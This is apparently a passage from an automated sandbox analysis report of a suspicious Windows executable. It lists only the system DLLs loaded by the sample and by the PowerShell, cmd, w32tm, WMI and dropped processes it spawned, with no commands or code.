Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mscoree.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: version.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: wldp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ktmw32.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: iphlpapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dnsapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winnsi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rasapi32.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rasman.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: rtutils.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mswsock.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winhttp.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winmm.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: winmmbase.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: mmdevapi.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: devobj.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ksuser.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: avrt.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: audioses.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: powrprof.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: umpdc.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: msacm32.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: midimap.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dwrite.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: edputil.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: windowscodecs.dll
